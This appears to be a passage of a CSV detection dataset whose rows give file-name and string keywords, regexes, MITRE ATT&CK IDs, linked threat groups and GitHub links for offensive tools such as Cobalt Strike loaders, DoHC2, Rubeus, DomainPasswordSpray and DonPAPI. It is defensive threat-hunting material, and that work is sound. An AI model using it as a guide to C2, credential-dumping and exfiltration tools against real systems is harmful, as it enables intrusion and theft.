"*docs.mythic-c2.net*",".{0,1000}docs\.mythic\-c2\.net.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","41353"
"*DocsPLZ\DocsPLZ.*",".{0,1000}DocsPLZ\\DocsPLZ\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","41354"
"*docstring for bruteforce.*",".{0,1000}docstring\sfor\sbruteforce\..{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","41355"
"*DoEvil()*",".{0,1000}DoEvil\(\).{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","41356"
"*Do-Exfiltration.ps1*",".{0,1000}Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41357"
"*Doge-Loader*xor.go*",".{0,1000}Doge\-Loader.{0,1000}xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","41358"
"*DoHC2*BeaconConnector*",".{0,1000}DoHC2.{0,1000}BeaconConnector.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41359"
"*DoHC2.exe*",".{0,1000}DoHC2\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41360"
"*DoHC2.py*",".{0,1000}DoHC2\.py.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41361"
"*DoHC2Runner.*",".{0,1000}DoHC2Runner\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41362"
"*DoHC2Runner.exe*",".{0,1000}DoHC2Runner\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41363"
"*DoHC2Runner.pdb*",".{0,1000}DoHC2Runner\.pdb.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41364"
"*DoHChannel.cs*",".{0,1000}DoHChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41365"
"*-Domain * -AllowDelegation *",".{0,1000}\-Domain\s.{0,1000}\s\-AllowDelegation\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41366"
"*-Domain * -SPN *",".{0,1000}\-Domain\s.{0,1000}\s\-SPN\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41367"
"*Domain controller is missing* use --dc.*",".{0,1000}Domain\scontroller\sis\smissing.{0,1000}\suse\s\-\-dc\..{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","41368"
"*Domain/CommandCollection*",".{0,1000}Domain\/CommandCollection.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","41369"
"*-domain_admins.txt*",".{0,1000}\-domain_admins\.txt.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","41370"
"*domain_analyzer.py*",".{0,1000}domain_analyzer\.py.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","41371"
"*domain_analyzer-master*",".{0,1000}domain_analyzer\-master.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","41372"
"*domain_hunter-v*.jar",".{0,1000}domain_hunter\-v.{0,1000}\.jar","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","41373"
"*domainDumpConfig*",".{0,1000}domainDumpConfig.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","41374"
"*DomainEnumerator*",".{0,1000}DomainEnumerator.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","41375"
"*domainhunter*",".{0,1000}domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. The primary tool output is a timestamped HTML table style report.","T1568 - T1596 - T1569 - T1593","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","41376"
"*domainhunter.py*",".{0,1000}domainhunter\.py.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","41377"
"*Domaininfo/Domaininfo.py*",".{0,1000}Domaininfo\/Domaininfo\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","41378"
"*Domainpassspray*",".{0,1000}Domainpassspray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41379"
"*DomainPasswordSpray*",".{0,1000}DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","N/A","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","41380"
"*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","41381"
"*DomainPasswordSpray.ps1*",".{0,1000}DomainPasswordSpray\.ps1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","41382"
"*DomainPasswordSpray.psm1*",".{0,1000}DomainPasswordSpray\.psm1.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","41383"
"*DomainRecon*ridbrute*",".{0,1000}DomainRecon.{0,1000}ridbrute.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41384"
"*DomainRecon/ADCS*",".{0,1000}DomainRecon\/ADCS.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41385"
"*DomainRecon/BloodHound*",".{0,1000}DomainRecon\/BloodHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41386"
"*DomainRecon/SilentHound*",".{0,1000}DomainRecon\/SilentHound.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41387"
"*DomainRecon\ADCSServer.txt*",".{0,1000}DomainRecon\\ADCSServer\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41388"
"*DomainRecon\DC-IPs.txt*",".{0,1000}DomainRecon\\DC\-IPs\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41389"
"*DomainRecon\ExploitableSystems.txt*",".{0,1000}DomainRecon\\ExploitableSystems\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41390"
"*DomainRecon\OxidBindings.txt*",".{0,1000}DomainRecon\\OxidBindings\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41391"
"*DomainRecon\Windows_Servers.txt*",".{0,1000}DomainRecon\\Windows_Servers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41392"
"*DomainTrustDiscovery_PowerView.py*",".{0,1000}DomainTrustDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41393"
"*domcachedump.py*",".{0,1000}domcachedump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41394"
"*domcachedumplive.py*",".{0,1000}domcachedumplive\.py.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","41395"
"*dome.py *",".{0,1000}dome\.py\s.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","41396"
"*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","41397"
"*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","41398"
"*dominik@dominikschuermann.de*",".{0,1000}dominik\@dominikschuermann\.de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41399"
"*donapapi -pvk *",".{0,1000}donapapi\s\-pvk\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41400"
"*Done dumping SAM hashes for host: *",".{0,1000}Done\sdumping\sSAM\shashes\sfor\shost\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41404"
"*Done! Check for existing lsass.dmp file into current folder*",".{0,1000}Done!\sCheck\sfor\sexisting\slsass\.dmp\sfile\sinto\scurrent\sfolder.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","41405"
"*DoNotUseThisPassword123!*",".{0,1000}DoNotUseThisPassword123!.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","41406"
"*DonPAPI ""$DOMAIN""/*",".{0,1000}DonPAPI\s\""\$DOMAIN\""\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41407"
